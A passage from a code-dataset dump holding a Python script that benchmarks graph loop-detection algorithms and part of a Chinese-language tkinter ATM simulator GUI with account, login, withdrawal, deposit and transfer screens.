output_name=calibrated_nonadapted_location)\r\n","repo_name":"icra/wOtter","sub_path":"src/7.4. statistics_contaminants.py","file_name":"7.4. statistics_contaminants.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"17466272897","text":"import os\nimport time\n\nfrom mygraph import MyGraph\nfrom dfs import DFS\nfrom johnson_simple_cycle import Johnson\nfrom tajan_scc import Tarjan_SCC\nfrom topology import Topology\nfrom undirectioned_bfs import Undirected_BFS\nfrom dsu import DSU\n\n\ndef benchmark(alg):\n    rounds = 10\n    t1 = time.time()  # start timing before the loop so all rounds are measured\n    for round in range(rounds):\n        result = alg.detect_loop()\n    t2 = time.time()\n    t = (t2 - t1) / rounds  # average time per round\n    return result, f\"{t:0,.8f}\"\n\ndef benchmark2(file):\n    rounds = 10\n    dsu = DSU()\n    dsu.load_file(file)\n\n    t1 = time.time()  # same fix as benchmark(): time the whole loop, then average\n    for round in range(rounds):\n        result = dsu.detect_loop()\n    t2 = time.time()\n    t = (t2 - t1) / rounds\n    return result, f\"{t:0,.8f}\"\n\nif __name__ == \"__main__\":\n    # Create graph using file\n    for file in os.listdir(\"data/\"):\n        if not file.endswith(\"edgelist\"):\n            continue\n\n        test_file = \"data/\" + file\n        print(\"test using file \", file)\n        g = MyGraph(1)\n        g.load_directed_graph(test_file)\n        #g.load_undirected_graph(test_file)\n\n\n        alg = DSU()\n        print(\"\\tDSU (undirected): \", end = \" \")\n        result, runtime = benchmark2(test_file)\n        print(\"\\t\\t result = \", result, \" time = \", runtime, \" second\", end=\" \")\n        print(\"\")\n\n\n        alg = Topology(g)\n        print(\"\\tTopology Sort: \", end = \" \")\n        result, runtime = benchmark(alg)\n        print(\"\\t\\t result = \", result, \" time = \", runtime, \" second\", end = \" \")\n        print(\"\")\n\n\n        alg = DFS(g)\n        print(\"\\t\\t\\tDFS: \", end = \" \")\n        result, runtime = benchmark(alg)\n        print(\"\\t\\t result = \", result, \" time = \", 
runtime, \" second\", end=\" \")\n print(\"\")\n\n\n alg = Johnson(g)\n print(\"\\tJohn's algorithm: \", end = \" \")\n result, runtime = benchmark(alg)\n print(\"\\t\\t result = \", result, \" time = \", runtime, \" second\", end=\" \")\n print(\"\")\n\n","repo_name":"jaber-the-great/Seagull-Network-verification","sub_path":"Code/dummyCode/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15807247592","text":"#!/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\nimport tkinter\r\nimport tkinter.messagebox\r\nfrom tkinter import ttk\r\nimport time\r\nfrom PIL import Image, ImageTk\r\n\"\"\"\r\n界面\r\n类名:View\r\n属性:\r\n行为:管理员界面 管理员登陆 系统功能界面\r\nopen_count\r\ncheck_deposit\r\nwithdrawal\r\ndeposit\r\ntransfer_accounts\r\nchange_password\r\nfreeze_card\r\nunfreeze_card\r\ncard_reissue\r\naccount_cancellation\r\nrefund_card\r\n\"\"\"\r\n\r\n\r\nclass TerminalGui(object):\r\n pass\r\n\r\n\r\nclass ATMGui(object):\r\n widget_list = []\r\n color_name = []\r\n color_dict = {\"浅粉红\": \"#FFB6C1\", \"粉红\": \"#FFC0CB\", \"猩红\": \"#DC143C\", \"淡紫红\": \"#FFF0F5\",\r\n \"弱紫罗兰红\": \"#DB7093\", \"热情的粉红\": \"#FF69B4\", \"深粉红\": \"#FF1493\", \"中紫罗兰红\": \"#C71585\",\r\n \"兰花紫\": \"#DA70D6\", \"蓟色\": \"#D8BFD8\", \"洋李色紫\": \"#DDA0DD\", \"紫罗兰\": \"#EE82EE\",\r\n \"洋红/玫瑰红\": \"#FF00FF\", \"灯笼海棠\": \"#FF00FF\", \"深洋红\": \"#8B008B\", \"紫色\": \"#800080\",\r\n \"暗紫罗兰\": \"#9400D3\", \"暗兰花紫\": \"#9932CC\", \"靛青\": \"#4B0082\",\r\n \"蓝紫罗兰\": \"#8A2BE2\", \"中紫色\": \"#9370DB\", \"中暗蓝色\": \"#7B68EE\", \"石蓝色\": \"#6A5ACD\",\r\n \"暗板岩蓝\": \"#483D8B\", \"熏衣草淡紫\": \"#E6E6FA\", \"幽灵白\": \"#F8F8FF\", \"纯蓝\": \"#0000FF\",\r\n \"中蓝色\": \"#0000CD\", \"午夜蓝\": \"#191970\", \"暗蓝色\": \"#00008B\", \"海军蓝\": \"#000080\",\r\n \"皇家蓝\": \"#4169E1\", \"矢车菊蓝\": \"#6495ED\", \"亮钢蓝\": \"#B0C4DE\", \"亮蓝灰\": \"#778899\",\r\n \"灰石色\": \"#708090\", \"闪兰色\": \"#1E90FF\", \"爱丽丝蓝\": \"#F0F8FF\", \"钢蓝\": \"#4682B4\", \"亮天蓝色\": \"#87CEFA\",\r\n \"天蓝色\": \"#87CEEB\", \"深天蓝\": \"#00BFFF\", \"亮蓝\": \"#ADD8E6\", \"火药青\": \"#B0E0E6\", \"军兰色\": \"#5F9EA0\",\r\n \"蔚蓝色\": \"#F0FFFF\", \"淡青色\": \"#E0FFFF\", \"弱绿宝石\": \"#AFEEEE\", \"青色\": \"#00FFFF\", \"浅绿色\": \"#00FFFF\",\r\n \"暗绿宝石\": \"#00CED1\", \"暗瓦灰色\": \"#2F4F4F\", \"暗青色\": \"#008B8B\", \"水鸭色\": \"#008080\", \"中绿宝石\": \"#48D1CC\",\r\n \"浅海洋绿\": \"#20B2AA\", \"绿宝石\": \"#40E0D0\", \"宝石碧绿\": \"#7FFFD4\", \"中宝石碧绿\": \"#66CDAA\", \"中春绿色\": \"#00FA9A\",\r\n \"薄荷奶油\": \"#F5FFFA\", \"春绿色\": \"#00FF7F\", \"中海洋绿\": \"#3CB371\", \"海洋绿\": \"#2E8B57\", \"蜜色\": \"#F0FFF0\",\r\n \"淡绿色\": \"#90EE90\", \"弱绿色\": \"#98FB98\", \"暗海洋绿\": \"#8FBC8F\", \"闪光深绿\": \"#32CD32\", \"闪光绿\": \"#00FF00\",\r\n \"森林绿\": \"#228B22\", \"纯绿\": \"#008000\", \"暗绿色\": \"#006400\", \"查特酒绿\": \"#7FFF00\", \"草坪绿\": \"#7CFC00\",\r\n \"绿黄色\": \"#ADFF2F\", \"暗橄榄绿\": \"#556B2F\", \"黄绿色\": \"#9ACD32\", \"橄榄褐色\": \"#6B8E23\", \"米色\": \"#F5F5DC\",\r\n \"亮菊黄\": \"#FAFAD2\", \"象牙色\": \"#FFFFF0\", \"浅黄色\": \"#FFFFE0\", \"纯黄\": \"#FFFF00\", \"橄榄\": \"#808000\",\r\n \"深卡叽布\": \"#BDB76B\", \"柠檬绸\": \"#FFFACD\", \"苍麒麟色\": \"#EEE8AA\", \"卡叽布\": \"#F0E68C\", \"金色\": \"#FFD700\",\r\n \"玉米丝色\": \"#FFF8DC\", \"金菊黄\": \"#DAA520\", \"暗金菊黄\": \"#B8860B\", \"花的白色\": \"#FFFAF0\", \"旧蕾丝\": \"#FDF5E6\",\r\n \"小麦色\": \"#F5DEB3\", \"鹿皮色\": \"#FFE4B5\", \"橙色\": \"#FFA500\", \"番木瓜\": \"#FFEFD5\", \"白杏色\": \"#FFEBCD\",\r\n \"纳瓦白\": \"#FFDEAD\", \"古董白\": \"#FAEBD7\", \"茶色\": \"#D2B48C\", \"硬木色\": \"#DEB887\", \"陶坯黄\": \"#FFE4C4\",\r\n \"深橙色\": 
\"#FF8C00\", \"亚麻布\": \"#FAF0E6\", \"秘鲁色\": \"#CD853F\", \"桃肉色\": \"#FFDAB9\", \"沙棕色\": \"#F4A460\",\r\n \"巧克力色\": \"#D2691E\", \"重褐色\": \"#8B4513\", \"海贝壳\": \"#FFF5EE\", \"黄土赭色\": \"#A0522D\", \"浅鲑鱼肉色\": \"#FFA07A\",\r\n \"珊瑚\": \"#FF7F50\", \"橙红色\": \"#FF4500\", \"深鲜肉\": \"#E9967A\", \"番茄红\": \"#FF6347\", \"浅玫瑰色\": \"#FFE4E1\",\r\n \"鲑鱼色\": \"#FA8072\", \"雪白色\": \"#FFFAFA\", \"淡珊瑚色\": \"#F08080\", \"玫瑰棕色\": \"#BC8F8F\", \"印度红\": \"#CD5C5C\",\r\n \"纯红\": \"#FF0000\", \"棕色\": \"#A52A2A\", \"火砖色\": \"#B22222\", \"深红色\": \"#8B0000\", \"栗色\": \"#800000\", \"纯白\": \"#FFFFFF\",\r\n \"白烟\": \"#F5F5F5\", \"淡灰色\": \"#DCDCDC\", \"浅灰色\": \"#D3D3D3\", \"银灰色\": \"#C0C0C0\", \"深灰色\": \"#A9A9A9\",\r\n \"灰色\": \"#808080\", \"暗淡灰\": \"#696969\", \"纯黑\": \"#000000\"}\r\n for name in color_dict.keys():\r\n color_name.append(name)\r\n\r\n def __init__(self, fnc_open_count,\r\n fnc_withdrawal,\r\n fnc_deposit,\r\n fnc_transfer_accounts,\r\n fnc_change_password,\r\n fnc_freeze_card,\r\n fnc_unfreeze_card,\r\n fnc_card_reissue,\r\n fnc_account_cancellation,\r\n fnc_refund_card,\r\n fnc_read_cord,\r\n fnc_login):\r\n self.fnc_open_count = fnc_open_count\r\n self.fnc_withdrawal = fnc_withdrawal\r\n self.fnc_deposit = fnc_deposit\r\n self.fnc_transfer_accounts = fnc_transfer_accounts\r\n self.fnc_change_password = fnc_change_password\r\n self.fnc_freeze_card = fnc_freeze_card\r\n self.fnc_unfreeze_card = fnc_unfreeze_card\r\n self.fnc_card_reissue = fnc_card_reissue\r\n self.fnc_account_cancellation = fnc_account_cancellation\r\n self.fnc_refund_card = fnc_refund_card\r\n self.fnc_read_cord = fnc_read_cord\r\n self.fnc_login = fnc_login\r\n self.font_color = \"#DEB887\"\r\n self.background_color = \"#696969\"\r\n # self.screen_col = self.background_color\r\n\r\n self.main_window = tkinter.Tk()\r\n self.main_window.title(\"ATM终端\")\r\n self.main_window.geometry(\"940x700+500+200\")\r\n\r\n self.screen_t = tkinter.StringVar()\r\n self.bt_l1_t = tkinter.StringVar()\r\n\r\n self.bt_l2_t = tkinter.StringVar()\r\n self.bt_l3_t = tkinter.StringVar()\r\n self.bt_l4_t = tkinter.StringVar()\r\n self.bt_r1_t = tkinter.StringVar()\r\n self.bt_r2_t = tkinter.StringVar()\r\n self.bt_r3_t = tkinter.StringVar()\r\n self.bt_r4_t = tkinter.StringVar()\r\n self.bt_b1_t = tkinter.StringVar()\r\n\r\n frm = tkinter.Frame(self.main_window, bg=\"silver\")\r\n frm.pack()\r\n\r\n self.screen_b = tkinter.Frame(frm, bg=\"silver\", height=100, width=1000)\r\n self.screen_b.pack(side=tkinter.BOTTOM, fill=tkinter.X)\r\n frm_l = tkinter.Frame(frm, bg=\"silver\", height=500, width=150)\r\n frm_l.pack(side=tkinter.LEFT, fill=tkinter.Y)\r\n frm_r = tkinter.Frame(frm, bg=\"silver\", height=500, width=150)\r\n frm_r.pack(side=tkinter.RIGHT, fill=tkinter.Y)\r\n frm_bg = tkinter.Frame(frm, bg=\"black\", height=600, width=700)\r\n frm_bg.pack(side=tkinter.TOP, pady=10)\r\n\r\n # image = Image.open(\"screen_m_bg.jpg\")\r\n # im = ImageTk.PhotoImage(image)\r\n # frm_m = tkinter.Frame(frm_bg, bg=\"green\", height=580, width=680)\r\n # frm_m.pack(padx=10, pady=10)\r\n\r\n # image = Image.open(r\"image\\bg1.jpg\") # screen_m_bg.jpg img.gif\r\n # bg1 = ImageTk.PhotoImage(image)\r\n # self.screen_m = tkinter.Canvas(frm_m, height=580, width=680, bg='cyan')\r\n # self.screen_m.create_image((0, 0), image=bg1) # 1440, 1280 1024, 768\r\n # self.screen_m.place(x=-2, y=-2)\r\n self.screen_m = tkinter.Frame(frm_bg, bg=self.background_color, height=580, width=680) # , image=im\r\n self.screen_m.pack(padx=10, pady=10) # self.screen_col\r\n\r\n # image = 
Image.open(r\"image\\button1.png\") # screen_m_bg.jpg img.gif\r\n # button1 = ImageTk.PhotoImage(image)\r\n # button1 = tkinter.PhotoImage(file=r\"image\\img.gif\")\r\n self.bt_l1 = tkinter.Button(frm_l, textvariable=self.bt_l1_t, width=10, height=2) # , image=button1\r\n self.bt_l1.pack(padx=20, pady=40)\r\n self.bt_l2 = tkinter.Button(frm_l, textvariable=self.bt_l2_t, width=10, height=2)\r\n self.bt_l2.pack(padx=20, pady=40)\r\n self.bt_l3 = tkinter.Button(frm_l, textvariable=self.bt_l3_t, width=10, height=2)\r\n self.bt_l3.pack(padx=20, pady=40)\r\n self.bt_l4 = tkinter.Button(frm_l, textvariable=self.bt_l4_t, width=10, height=2)\r\n self.bt_l4.pack(padx=20, pady=40)\r\n\r\n self.bt_r1 = tkinter.Button(frm_r, textvariable=self.bt_r1_t, width=10, height=2)\r\n self.bt_r1.pack(padx=20, pady=40)\r\n self.bt_r2 = tkinter.Button(frm_r, textvariable=self.bt_r2_t, width=10, height=2)\r\n self.bt_r2.pack(padx=20, pady=40)\r\n self.bt_r3 = tkinter.Button(frm_r, textvariable=self.bt_r3_t, width=10, height=2)\r\n self.bt_r3.pack(padx=20, pady=40)\r\n self.bt_r4 = tkinter.Button(frm_r, textvariable=self.bt_r4_t, width=10, height=2)\r\n self.bt_r4.pack(padx=20, pady=40)\r\n\r\n self.bt_b1 = tkinter.Button(self.screen_b, textvariable=self.bt_b1_t, width=20, height=2) #\r\n self.bt_b1.pack(side=tkinter.RIGHT, padx=20, pady=20)\r\n self.page_home()\r\n\r\n def set_fnc(self, bt, fnc):\r\n if bt is \"l1\":\r\n self.bt_l1.bind(\"\", fnc)\r\n elif bt is \"l2\":\r\n self.bt_l2.bind(\"\", fnc)\r\n elif bt is \"l3\":\r\n self.bt_l3.bind(\"\", fnc)\r\n elif bt is \"l4\":\r\n self.bt_l4.bind(\"\", fnc)\r\n elif bt is \"r1\":\r\n self.bt_r1.bind(\"\", fnc)\r\n elif bt is \"r2\":\r\n self.bt_r2.bind(\"\", fnc)\r\n elif bt is \"r3\":\r\n self.bt_r3.bind(\"\", fnc)\r\n elif bt is \"r4\":\r\n self.bt_r4.bind(\"\", fnc)\r\n else:\r\n self.bt_b1.bind(\"\", fnc)\r\n\r\n @staticmethod\r\n def message_box(title: str, info: str):\r\n tkinter.messagebox.showinfo(title, info)\r\n\r\n def clear_page(self):\r\n for w in self.widget_list:\r\n w.destroy()\r\n self.widget_list = []\r\n self.bt_l1.unbind_all(\"\")\r\n self.bt_l1_t.set(\"\")\r\n self.bt_l2.unbind_all(\"\")\r\n self.bt_l2_t.set(\"\")\r\n self.bt_l3.unbind_all(\"\")\r\n self.bt_l3_t.set(\"\")\r\n self.bt_l4.unbind_all(\"\")\r\n self.bt_l4_t.set(\"\")\r\n self.bt_r1.unbind_all(\"\")\r\n self.bt_r1_t.set(\"\")\r\n self.bt_r2.unbind_all(\"\")\r\n self.bt_r2_t.set(\"\")\r\n self.bt_r3.unbind_all(\"\")\r\n self.bt_r3_t.set(\"\")\r\n self.bt_r4.unbind_all(\"\")\r\n self.bt_r4_t.set(\"\")\r\n self.bt_b1.unbind_all(\"\")\r\n self.bt_b1_t.set(\"\")\r\n\r\n def set_color(self, card_number, balance, bg_col_name=None, font_col_name=None):\r\n if bg_col_name is not None:\r\n bg_col = self.color_dict[bg_col_name]\r\n self.background_color = bg_col\r\n self.screen_m.config(bg=self.background_color)\r\n else:\r\n font_col = self.color_dict[font_col_name]\r\n self.font_color = font_col\r\n self.page_count(card_number, balance)\r\n\r\n def page_building(self):\r\n self.clear_page()\r\n self.bt_r4_t.set(\"返回\")\r\n self.set_fnc(\"r4\", lambda event: self.page_home())\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"功能即将到来,敬请期待\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb1.place(x=250, y=10)\r\n self.widget_list.append(lb1)\r\n\r\n def page_home(self):\r\n self.clear_page()\r\n self.bt_l1_t.set(\"开户\")\r\n self.set_fnc(\"l1\", lambda event: self.page_open_count())\r\n self.bt_l2_t.set(\"解锁\")\r\n self.set_fnc(\"l2\", lambda 
event: self.page_unfreeze_card())\r\n self.bt_l3_t.set(\"补卡\")\r\n self.set_fnc(\"l3\", lambda event: self.page_building())\r\n s = \"\"\"\r\n *************************************\r\n * *\r\n * 欢迎使用神马银行ATM机 *\r\n * *\r\n * *\r\n *************************************\r\n \"\"\"\r\n self.screen_t.set(s)\r\n lb1 = tkinter.Label(self.screen_m,\r\n textvariable=self.screen_t,\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"center\")\r\n lb1.place(y=200)\r\n self.widget_list.append(lb1)\r\n\r\n e1 = tkinter.Entry(self.screen_b, font=(\"黑体\", 12))\r\n e1.place(x=550, y=35)\r\n self.widget_list.append(e1)\r\n\r\n self.bt_b1_t.set(\"请放入你的银行卡\")\r\n self.set_fnc(\"b1\",\r\n lambda event: self.fnc_read_cord(eval(e1.get()) if e1.get().isdigit() else None))\r\n\r\n def page_open_count(self):\r\n self.clear_page()\r\n self.bt_r4_t.set(\"返回\")\r\n self.set_fnc(\"r4\", lambda event: self.page_home())\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"请输入您的个人信息\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb1.place(x=250, y=10)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"姓名:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb2.place(x=240, y=100)\r\n self.widget_list.append(lb2)\r\n e1 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e1.place(x=300, y=105)\r\n self.widget_list.append(e1)\r\n\r\n lb3 = tkinter.Label(self.screen_m,\r\n text=\"身份证号:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb3.place(x=200, y=130)\r\n self.widget_list.append(lb3)\r\n e2 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e2.place(x=300, y=135)\r\n self.widget_list.append(e2)\r\n\r\n lb4 = tkinter.Label(self.screen_m,\r\n text=\"联系方式:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb4.place(x=200, y=160)\r\n self.widget_list.append(lb4)\r\n e3 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e3.place(x=300, y=165)\r\n self.widget_list.append(e3)\r\n\r\n lb5 = tkinter.Label(self.screen_m,\r\n text=\"住址:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb5.place(x=240, y=190)\r\n self.widget_list.append(lb5)\r\n # **************\r\n e4 = ttk.Combobox(self.screen_m)\r\n e4[\"value\"] = (\"北京\", \"天津\", \"河北\", \"内蒙古\",\r\n \"辽宁\", \"吉林\", \"黑龙江\", \"上海\",\r\n \"江苏\", \"浙江\", \"安徽\", \"福建\", \"江西\",\r\n \"山东\", \"河南\", \"湖北\", \"湖南\", \"广东\",\r\n \"广西\", \"海南\", \"重庆\", \"四川\", \"贵州\",\r\n \"云南\", \"西藏\", \"陕西\", \"甘肃\", \"青海\",\r\n \"宁夏\", \"新疆\", \"香港\", \"澳门\", \"台湾\",\r\n \"具体的我就不写了。。。\")\r\n e4.current(0)\r\n e4.place(x=300, y=195)\r\n self.widget_list.append(e4)\r\n # **************\r\n # e4 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n # e4.place(x=300, y=195)\r\n # self.widget_list.append(e4)\r\n\r\n lb6 = tkinter.Label(self.screen_m,\r\n text=\"设置密码:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb6.place(x=200, y=220)\r\n self.widget_list.append(lb6)\r\n e5 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e5.place(x=300, y=225)\r\n self.widget_list.append(e5)\r\n\r\n bt1 = tkinter.Button(self.screen_m, text=\"提交\", width=10, height=1, font=(\"黑体\", 15))\r\n bt1.place(x=290, y=255)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_open_count(e1.get(), e2.get(), e3.get(), e4.get(), eval(e5.get()) if e5.get().isdigit() 
else None))\r\n self.widget_list.append(bt1)\r\n\r\n lb7 = tkinter.Label(self.screen_m,\r\n text=\"请及时向前台提交纸质资料!\",\r\n bg=self.background_color, fg=\"red\",\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb7.place(x=220, y=290)\r\n self.widget_list.append(lb7)\r\n\r\n def page_login(self, card_number: int):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"读取成功\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"请输入密码:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb2.place(x=200, y=260)\r\n self.widget_list.append(lb2)\r\n e1 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e1.place(x=330, y=265)\r\n self.widget_list.append(e1)\r\n\r\n bt1 = tkinter.Button(self.screen_m,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=320, y=330)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_login(card_number, e1.get()))\r\n self.widget_list.append(bt1)\r\n\r\n def page_count(self, card_number: int, balance: float):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n\r\n self.bt_l1_t.set(\"取款\")\r\n self.bt_l1.bind(\"\",\r\n lambda event: self.page_withdrawal(card_number, balance))\r\n self.bt_l2_t.set(\"存款\")\r\n self.bt_l2.bind(\"\",\r\n lambda event: self.page_deposit(card_number, balance))\r\n self.bt_l3_t.set(\"转账\")\r\n self.bt_l3.bind(\"\",\r\n lambda event: self.page_transfer_accounts(card_number, balance))\r\n self.bt_l4_t.set(\"改密\")\r\n self.bt_l4.bind(\"\",\r\n lambda event: self.page_change_password(card_number, balance))\r\n self.bt_r1_t.set(\"锁定\")\r\n self.bt_r1.bind(\"\",\r\n lambda event: self.page_freeze_card(card_number, balance))\r\n self.bt_r2_t.set(\"销户\")\r\n self.bt_r2.bind(\"\",\r\n lambda event: self.page_account_cancellation(card_number, balance))\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"卡号:%d 账户余额:%.2f\" % (card_number, balance),\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"请选择功能\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"center\")\r\n lb2.place(x=290, y=270)\r\n self.widget_list.append(lb2)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"设置背景颜色:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb2.place(x=200, y=350)\r\n self.widget_list.append(lb2)\r\n e2 = ttk.Combobox(self.screen_m)\r\n e2[\"value\"] = self.color_name\r\n for index, s in enumerate(self.color_name):\r\n if self.color_dict[s] == self.background_color:\r\n e2.current(index)\r\n e2.place(x=340, y=350)\r\n e2.bind(\"<>\", lambda event: self.set_color(card_number, balance, bg_col_name=e2.get()))\r\n self.widget_list.append(e2)\r\n\r\n lb3 = tkinter.Label(self.screen_m,\r\n text=\"设置字体颜色:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"n\")\r\n lb3.place(x=200, y=380)\r\n self.widget_list.append(lb3)\r\n e3 = ttk.Combobox(self.screen_m)\r\n e3[\"value\"] = self.color_name\r\n for index, s in enumerate(self.color_name):\r\n if self.color_dict[s] == self.font_color:\r\n 
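# a ttk.Combobox reports a selection through the \"<<ComboboxSelected>>\" virtual\r\n
                # event; the bare \"<>\" sequences in the bind() calls around these comboboxes\r\n
                # appear to be that name with the angle-bracket contents lost, so binding\r\n
                # \"<<ComboboxSelected>>\" is most likely what was intended here\r\n
                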
e3.current(index)\r\n e3.place(x=340, y=380)\r\n e3.bind(\"<>\", lambda event: self.set_color(card_number, balance, font_col_name=e3.get()))\r\n self.widget_list.append(e3)\r\n\r\n def page_withdrawal(self, card_number, balance):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n self.bt_r4_t.set(\"返回\")\r\n self.set_fnc(\"r4\", lambda event: self.page_count(card_number, balance))\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"卡号:%d 账户余额:%.2f\" % (card_number, balance),\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"请输入取款金额:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb2.place(x=180, y=260)\r\n self.widget_list.append(lb2)\r\n e1 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e1.place(x=350, y=263)\r\n self.widget_list.append(e1)\r\n bt1 = tkinter.Button(self.screen_m,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=320, y=330)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_withdrawal(event, eval(e1.get())))\r\n self.widget_list.append(bt1)\r\n\r\n def page_deposit(self, card_number, balance):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n self.bt_r4_t.set(\"返回\")\r\n self.bt_r4.bind(\"\",\r\n lambda event: self.page_count(card_number, balance))\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"卡号:%d 账户余额:%.2f\" % (card_number, balance),\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"请将现金放入下边现金槽中。\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"center\")\r\n lb2.place(x=210, y=260)\r\n self.widget_list.append(lb2)\r\n e1 = tkinter.Entry(self.screen_b, font=(\"黑体\", 12))\r\n e1.place(x=250, y=35)\r\n self.widget_list.append(e1)\r\n bt1 = tkinter.Button(self.screen_b,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=450, y=25)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_deposit(eval(e1.get())))\r\n self.widget_list.append(bt1)\r\n\r\n def page_transfer_accounts(self, card_number: int, balance: float):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n self.bt_r4_t.set(\"返回\")\r\n self.bt_r4.bind(\"\",\r\n lambda event: self.page_count(card_number, balance))\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"卡号:%d 账户余额:%.2f\" % (card_number, balance),\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"请输入对方卡号:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb2.place(x=180, y=240)\r\n self.widget_list.append(lb2)\r\n e1 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e1.place(x=350, y=243)\r\n self.widget_list.append(e1)\r\n\r\n lb3 = tkinter.Label(self.screen_m,\r\n text=\"请输入转账金额:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb3.place(x=180, y=270)\r\n self.widget_list.append(lb3)\r\n e2 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n 
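# NOTE: the confirm handlers below feed these entries straight into eval(),\r\n
        # which executes arbitrary input; a safer sketch (hypothetical, not in the\r\n
        # original) for the amount field would be:\r\n
        #   amount = float(e2.get()) if e2.get().replace('.', '', 1).isdigit() else None\r\n
        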
